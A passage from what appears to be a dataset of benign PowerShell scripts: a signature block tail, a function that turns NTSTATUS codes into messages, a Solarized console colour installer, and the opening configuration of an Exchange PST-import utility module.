# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHpu2F8FvGRfddxbJIc4bRwU
# 5gIfFkL+YIcE13z6dtA0MEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAkxIofBAkoBNAvLWc1C4d07uoFJ27HYQ6h/LSwAW68Iqm6/p2FaoIJVco
# GfwkiM5fbpV/PIWHSlWGRshRrPPmqBAhRO22HaSdfXNfB6fY7Y9BKuJU/SG+z0QS
# kV75d5BN5MwY1CcPEYU3hG9DWFyP1v8tmfLJsX1zte7vXc+jP6L1cqGeG3XlrpfW
# 1B6J2mpvbqPHK722By8vUPB0BGQLFaaHN5GMB9/T+F9+KMihX+ciew/u3X6ev0G9
# Ar/omt+ZIv8guUIobsNIa9Pqw/nD+bm28aLsrRNgJOBZWXrh4tHx5KYBausupsFB
# p2k3MA2rreo3Ecz4CeQ7jZj8KR5X1KGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC
# F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq
# hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCDP9W5z6QA8ONHiseOtFAr7GekLJ7c/1iah4oEq8i/bbgIGZfMsv/DM
# GBMyMDI0MDQwNTIxMTAzMi45NzVaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg
# ghHtMIIHIDCCBQigAwIBAgITMwAAAe4F0wIwspqdpwABAAAB7jANBgkqhkiG9w0B
# AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1
# NDRaFw0yNTAzMDUxODQ1NDRaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z
# MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046RTAwMi0wNUUwLUQ5NDcxJTAjBgNV
# BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQC+8byl16KEia8xKS4vVL7REOOR7LzYCLXEtWgeqyOV
# lrzuEz+AoCa4tBGESjbHTXECeMOwP9TPeKaKalfTU5XSGjpJhpGx59fxMJoTYWPz
# zD0O2RAlyBmOBBmiLDXRDQJL1RtuAjvCiLulVQeiPI8V7+HhTR391TbC1beSxwXf
# dKJqY1onjDawqDJAmtwsA/gmqXgHwF9fZWcwKSuXiZBTbU5fcm3bhhlRNw5d04Ld
# 15ZWzVl/VDp/iRerGo2Is/0Wwn/a3eGOdHrvfwIbfk6lVqwbNQE11Oedn2uvRjKW
# EwerXL70OuDZ8vLzxry0yEdvQ8ky+Vfq8mfEXS907Y7rN/HYX6cCsC2soyXG3OwC
# tLA7o0/+kKJZuOrD5HUrSz3kfqgDlmWy67z8ZZPjkiDC1dYW1jN77t5iSl5Wp1HK
# Bp7JU8RiRI+vY2i1cb5X2REkw3WrNW/jbofXEs9t4bgd+yU8sgKn9MtVnQ65s6QG
# 72M/yaUZG2HMI31tm9mooH29vPBO9jDMOIu0LwzUTkIWflgd/vEWfTNcPWEQj7fs
# WuSoVuJ3uBqwNmRSpmQDzSfMaIzuys0pvV1jFWqtqwwCcaY/WXsb/axkxB/zCTdH
# SBUJ8Tm3i4PM9skiunXY+cSqH58jWkpHbbLA3Ofss7e+JbMjKmTdcjmSkb5oN8qU
# 1wIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFBCIzT8a2dwgnr37xd+2v1/cdqYIMB8G
# A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG
# Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy
# MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w
# XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy
# dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG
# A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD
# AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQB3ZyAva2EKOWSVpBnYkzX8f8GZjaOs577F
# 9o14Anh9lKy6tS34wXoPXEyQp1v1iI7rJzZVG7rpUznay2n9csfn3p6y7kYkHqtS
# ugCGmTiiBkwhFfSByKPI08MklgvJvKTZb673yGfpFwPjQwZeI6EPj/OAtpYkT7IU
# XqMki1CRMJKgeY4wURCccIujdWRkoVv4J3q/87KE0qPQmAR9fqMNxjI3ZClVxA4w
# iM3tNVlRbF9SgpOnjVo3P/I5p8Jd41hNSVCx/8j3qM7aLSKtDzOEUNs+ZtjhznmZ
# gUd7/AWHDhwBHdL57TI9h7niZkfOZOXncYsKxG4gryTshU6G6sAYpbqdME/+/g1u
# er7VGIHUtLq3W0Anm8lAfS9PqthskZt54JF28CHdsFq/7XVBtFlxL/KgcQylJNni
# a+anixUG60yUDt3FMGSJI34xG9NHsz3BpqSWueGtJhQ5ZN0K8ju0vNVgF+Dv05si
# rPg0ftSKf9FVECp93o8ogF48jh8CT/B32lz1D6Truk4Ezcw7E1OhtOMf7DHgPMWf
# 6WOdYnf+HaSJx7ZTXCJsW5oOkM0sLitxBpSpGcj2YjnNznCpsEPZat0h+6d7ulRa
# WR5RHAUyFFQ9jRa7KWaNGdELTs+nHSlYjYeQpK5QSXjigdKlLQPBlX+9zOoGAJho
# Zfrpjq4nQDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI
# hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy
# MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC
# AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg
# M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF
# dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6
# GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp
# Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu
# yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E
# XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0
# lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q
# GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ
# +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA
# PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw
# EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG
# NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV
# MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj
# cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK
# BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC
# AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX
# zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v
# cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI
# KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG
# 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x
# M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC
# VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449
# xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM
# nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS
# PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d
# Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn
# GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs
# QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL
# jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL
# 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ
# MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
# bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw
# b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn
# MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkUwMDItMDVFMC1EOTQ3MSUwIwYDVQQD
# ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCI
# o6bVNvflFxbUWCDQ3YYKy6O+k6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6bqqaTAiGA8yMDI0MDQwNTE2NTA0
# OVoYDzIwMjQwNDA2MTY1MDQ5WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDpuqpp
# AgEAMAoCAQACAhv1AgH/MAcCAQACAhM5MAoCBQDpu/vpAgEAMDYGCisGAQQBhFkK
# BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ
# KoZIhvcNAQELBQADggEBAH7qUgt3p9OfBquhiIyWJXT4qqA6yV1T1owQ+3KNgHB1
# kPc9Zo2Td/jHK1sg443ZCLa7KzAqNJN7Hkv05oXOmEeMDld53uclk0OVxJpzUqO6
# Nk9S0ZvYcZAzZPeZV6jgisV6KOo02KMMKBh7D4tBh0soZNlqpRtQCuqXE+NqST8S
# x236scBsqJpyWrAsQYVQLaLJEkZCuUWY5hi/5DOc3h7aU9kYu1E6Zx/fgSm0wkJR
# VOiJjcULnlebASnKdTmhE4CEDwEkISx22Ohv6f1b78yxW7QRDyRYfamKxpLYcUjh
# 1UUf0yfEj6oQlgfK5P3EDmlhx2P928KB4awFLYXJ1YYxggQNMIIECQIBATCBkzB8
# MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
# bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
# aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe4F0wIwspqdpwABAAAB
# 7jANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE
# MC8GCSqGSIb3DQEJBDEiBCB6aAwcKUozS7b7jz+V0dHxyP+f/lIbFRB5dUf/d6+G
# 0jCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIE9QdxSVhfq+Vdf+DPs+5EIk
# Bz9oCS/OQflHkVRhfjAhMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAHuBdMCMLKanacAAQAAAe4wIgQgmxnWBa69rjeszs+eDaMhfBYw
# yjK9UCo3wRSwb7HsQJ4wDQYJKoZIhvcNAQELBQAEggIADn1g6Rln2qSe7imc8yq/
# w614b3Nf64f0gIkmqswQjnD9412vR7PM0eGvGxyGCHC+MqJ8JQJGGinzDPeVAa7+
# sn3NvIkxINr7IF6okpMsEruNVZSvJcOytArfaL2g92irJzLQKGU3BSbEMTCc3tcE
# b2MJj2YxSjwLok2ULraJqR+//2O+b7g29ccdUIpne0DURSyqUwtrAiSvoxQWBCme
# NCDJh8cj3D8Ibgot7QPxlI9SOLGzdhF3ZelF7A7MrRFDDn5+3Yv8IXf5gsO+JZHz
# gpl+P2Jm1LkfjMob4HAkLCpY9kdfrLSq9oFeYUPk8yAynJG65azT0gNl4QkV/nW/
# d+RC+oHoFRbJ0tDkZY/pf4wp6KAAe/MNIXDuvkfKLlz51dQ7avP5ZxtumUc1hz1w
# ZJycOh1dSMWmuzVkytjOpQHqp5eyxQTwWQM/pc7g2X2vdStIs8mpopMzvrtCZApP
# pYw/9j9JDhz7MmVv0Bk8a7C6uL/YfxzFbFaAjspBI36TOM/SO4A7fFKo2lMMsiLS
# WJDcK64yBJnL801dlpbw9Wy8m/Bo4wHroElccO/Tg0b2P3B8QBCY9O76ZW9W36Tj
# vdMIgbO7nQ8lkdy2c+R6tJiCla454jc3ub/ttaOHRO2OBcVucKPpnQLHjDxvt3EZ
# bNIlQFy0qqcC2/kW6fWOuv8=
# SIG # End signature block
|
combined_dataset/train/non-malicious/Get-NTStatusException.ps1
|
Get-NTStatusException.ps1
|
function Get-NTStatusException
{
<#
.SYNOPSIS
Resolves an NTSTATUS error code.
Author: Matthew Graeber (@mattifestation)
.DESCRIPTION
Get-NTStatusException returns a friendly error message based on the NTSTATUS code passed in. This function is useful when interacting with Windows Native API functions with NTSTATUS return codes.
.PARAMETER ErrorCode
An NTSTATUS code returned by a native API function (Nt or Rtl prefixed functions)
.EXAMPLE
C:\\PS> Get-NTStatusException -ErrorCode 0xC0000005
Invalid access to memory location.
.EXAMPLE
C:\\PS> 0xC0000005, 0xC0000017, 0x00000000 | Get-NTStatusException
Invalid access to memory location.
Not enough storage is available to process this command.
The operation completed successfully.
.LINK
http://www.exploit-monday.com/
#>
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
[Int32[]]
$ErrorCode
)
BEGIN
{
Set-StrictMode -Version 2
$Win32Native = [AppDomain]::CurrentDomain.GetAssemblies() | %{ $_.GetTypes() } | ? { $_.FullName -eq 'Microsoft.Win32.Win32Native' }
if ($Win32Native -eq $null)
{
throw "Unable to get a reference to type: Microsoft.Win32.Win32Native"
}
$LsaNtStatusToWinError = $Win32Native.GetMethod('LsaNtStatusToWinError', [Reflection.BindingFlags] 'NonPublic, Static')
$GetMessage = $Win32Native.GetMethod('GetMessage', [Reflection.BindingFlags] 'NonPublic, Static')
}
PROCESS
{
foreach ($Error in $ErrorCode)
{
$WinErrorCode = $LsaNtStatusToWinError.Invoke($null, @($ErrorCode))
Write-Output $GetMessage.Invoke($null, @($WinErrorCode))
}
}
END{}
}
|
combined_dataset/train/non-malicious/Install-Solarized_1.ps1
|
Install-Solarized_1.ps1
|
[CmdletBinding()]
param($Path = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk" )
# SOLARIZED HEX 16/8 TERMCOL XTERM/HEX L*A*B RGB HSB
# --------- ------- ---- ------- ----------- ---------- ----------- -----------
$base03 = "#002b36" # 8/4 brblack 234 #1c1c1c 15 -12 -12 0 43 54 193 100 21
$base02 = "#073642" # 0/4 black 235 #262626 20 -12 -12 7 54 66 192 90 26
$base01 = "#586e75" # 10/7 brgreen 240 #585858 45 -07 -07 88 110 117 194 25 46
$base00 = "#657b83" # 11/7 bryellow 241 #626262 50 -07 -07 101 123 131 195 23 51
$base0 = "#839496" # 12/6 brblue 244 #808080 60 -06 -03 131 148 150 186 13 59
$base1 = "#93a1a1" # 14/4 brcyan 245 #8a8a8a 65 -05 -02 147 161 161 180 9 63
$base2 = "#eee8d5" # 7/7 white 254 #e4e4e4 92 -00 10 238 232 213 44 11 93
$base3 = "#fdf6e3" # 15/7 brwhite 230 #ffffd7 97 00 10 253 246 227 44 10 99
$yellow = "#b58900" # 3/3 yellow 136 #af8700 60 10 65 181 137 0 45 100 71
$orange = "#cb4b16" # 9/3 brred 166 #d75f00 50 50 55 203 75 22 18 89 80
$red = "#dc322f" # 1/1 red 160 #d70000 50 65 45 220 50 47 1 79 86
$magenta = "#d33682" # 5/5 magenta 125 #af005f 50 65 -05 211 54 130 331 74 83
$violet = "#6c71c4" # 13/5 brmagenta 61 #5f5faf 50 15 -45 108 113 196 237 45 77
$blue = "#268bd2" # 4/4 blue 33 #0087ff 55 -10 -45 38 139 210 205 82 82
$cyan = "#2aa198" # 6/6 cyan 37 #00afaf 60 -35 -05 42 161 152 175 74 63
$green = "#859900" # 2/2 green 64 #5f8700 60 -20 65 133 153 0 68 100 60
# Requires the "Get-Link script":http://poshcode.org/2493
$lnk = Get-Link $Path
## On Windows, we don't have "Magenta" and "BrightMagenta" -- We have "Magenta" and "DarkMagenta"
## In any case, the Solarized order is confusing, so we'll use the .Net ConsoleColor order instead
$lnk.ConsoleColors[0] = $Base03
$lnk.ConsoleColors[1] = $Base02
$lnk.ConsoleColors[2] = $Base01
$lnk.ConsoleColors[3] = $Base00
$lnk.ConsoleColors[4] = $Base0
$lnk.ConsoleColors[5] = $Violet
$lnk.ConsoleColors[6] = $Orange
## Yes, these really are switched, numerically speaking ...
## They're really DarkWhite (Gray) and LightBlack (DarkGray)
$lnk.ConsoleColors[7] = $Base2
$lnk.ConsoleColors[8] = $Base1
$lnk.ConsoleColors[9] = $Blue
$lnk.ConsoleColors[10] = $Green
$lnk.ConsoleColors[11] = $Cyan
$lnk.ConsoleColors[12] = $Red
$lnk.ConsoleColors[13] = $Magenta
$lnk.ConsoleColors[14] = $Yellow
$lnk.ConsoleColors[15] = $Base3
$lnk.Save()
|
combined_dataset/train/non-malicious/PSTUtility_2.psm1.ps1
|
PSTUtility_2.psm1.ps1
|
#=============================================================================
#
# PST Utilities - For Discovery, Import, Removal
#
# Dan Thompson
# dethompson71 at live dot com
#
# This collection of tools for importing PSTs has been pieced together
# over many months of trial and error.
#
# Goal is to get PST files off the user's home share and into an archive mailbox.
#
# Throughout these scripts, what Microsoft calls a "Personal Archive" and
# "Archive Mailbox," we call an "Online PST" or "Online Archive PST."
# All these terms are the same thing.
#
# We used the name "Online PST" due to the user's fear of the word "Archive"
#
# They thought we were pushing their mail down some hole and they would
# never see it again. "Online PST" is more friendly and helps them understand
# the overall goal. Once we started importing PSTs for users, others saw the
# increased quota, as well as seeing the mail in OWA, and many requests
# started pouring in.
#
# All part of our evil plan to erradicate PST files. ;)
#
# The reason we created these scripts and made particular choices are detailed here:
# http://powershellatwork.blogspot.com/2012/01/enterprise-wide-pst-import-beginnings.html
#
# Yes, we know about the tool PST Capture, but it just wasn't going to work for us.
#
# requires Quest Powershell Commands for Active Directory
# (Active Roles Management Shell)
# http://www.quest.com/powershell/activeroles-server.aspx
#
# I don't claim any of this to be perfect or work for every person out of the
# box. You will certainly have to modify some settings to begin using this set
# of tools in your environment.
#
# I hope someone can use this as a starting point if they are in a
# similar situation.
#
# I also suggest you at least try PST Capture first. It did not work for me for
# varous reasons. Your mileage may vary.
#
#
#=============================================================================
#=============================================================================
# File Locations: PSTImportJobQueue; ReportJobQueue; PSTFileLogQueue
#=============================================================================
#====> TO DO -- add your servername and drive location
$Script:PSTServer = '<ServerBIOSName>' # example 'Ex01'
$Script:PSTDrive = '<drive>' # admin share example: 'd$'
$Script:PSTShareDir = '\\\\' + $Script:PSTServer + '\\PSTImports' #Exchange servers must have rights to this share
$Script:PSTUNCDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\pstimports' #UNC path to same share
$Script:CASConnectLogDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\CASConnectLogs' # where 'Connect' logs are kept
$Script:ReportsUNCDir = '\\\\' + $Script:PSTServer + '\\' + $Script:PSTDrive + '\\Web\\Data\\Current' #UNC path to report results
$Script:PSTQueueFile = $Script:PSTShareDir + '\\PSTImportJobQueue.csv'
$Script:PSTCompeletDir = $Script:PSTShareDir + '\\^Completed' # so it always shows at the top
$Script:PSTCompleteFile = $Script:PSTShareDir + '\\PSTImportCompleteQueue.csv' # Completed PST Import Jobs
$Script:NotifiedFile = $Script:PSTShareDir + '\\PSTImportJobNotified.txt' # Users who have been notified
$Script:ArchReportFile = $Script:PSTUNCDir + '\\ArchiveReport.csv' # The daily archive report (also a webpage)
$Script:ArchPSTFile = $Script:PSTUNCDir + '\\ArchivePSTHistory.csv' # history of PSTs owned by Archive Mailbox users
$Script:MoveFileLog = $Script:PSTUNCDir + '\\MovePSTFIles-' + $Script:T + '.log' # the Move log created when run
$Script:AllPSTFileLog = $Script:PSTUNCDir + '\\AllPSTHistory.csv' # the history of ALL PST files discovered
# always shows at the bottom of directory listings
$Script:ImportQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportJobQueue' + "-" + $Script:TE + ".csv" # backup of ImportQueue
$Script:CompleteQueueFileBU = $Script:PSTShareDir + '\\ZZSavedQueueLogs\\PSTImportCompleteQueue' + "-" + $Script:TE + ".csv" #backup of Completed Jobs
$Script:ArchReportFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchiveReport-' + $Script:TE + '.csv' #back up of a report that is generated daily?
$Script:ArchPSTFileBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\ArchivePSTHistory-' + $Script:TE + '.csv' # back up of ArchiveMailboxOwners PSTs
$Script:AllPSTFileLogBU = $Script:PSTUNCDir + '\\ZZSavedQueueLogs\\AllPSTHistory-' + $Script:TE + '.csv' # backup of history of ALL psts discovered
#=============================================================================
# Variables
#=============================================================================
# This site name is used to determine what tool is used to copy files.
# Copy-item is used for local PST files; BITS is used for distant files.
$Script:LocalADSite = 'HQ'
$Script:PSTUtilityVersion = "14.1.20121015"
$Script:MinRunJobs = 9 # minimum jobs running before we start more - 0 means no jobs can be running
$Script:MaxRunJobs = 19 # how many job can run at once
$Script:FreeSpaceLimit = 199471 # set in MB, the lowest you want free space to go on the Import Share
$Script:T = Get-Date -Format yyyyMMdd # today
$Script:TE = Get-Date -Format yyyyMMddhhmmss # today extended
$Script:SMTPServer = "smtpserver.domain.com" # where to send
$Script:AdminEmail = "admin1@domain.com, admin2@domain.com" # gets notified, sent daily summary report email
$Script:BossEmail = "boss@domain.com" # send daily report on Wednesday only (Weekly Summary Report)
$Script:FromEmail = "EmailTeam@domain.com" # from address of reports to porcessed users
$Script:FromReportEmail = "PSTReports@domain.com" # from Address of manager's summary reports
#=============================================================================
# these are all the people that have applications which generate and process .PST files
# but are Java configuration files. Not Mail. Ignore anything not in an "Outlook" directory
# --> Add DisplayName of user...
$Script:SpecialPeople = @("<DisplayName1>","<Displayname2>")
#=============================================================================
# These users will be ignored and not 'messed with'
# There will be some ;)
$Script:IgnoreUsers = @("<DisplayName1>","<DisplayName2>")
#=============================================================================
# Job Objects: PSTJob; ReportJob; PSTFileLog
#=============================================================================
Function New-PSTFileLogObject(){
<#
.SYNOPSIS
Return a new object to track a PST file.
.DESCRIPTION
Return a new object to track a PST file.
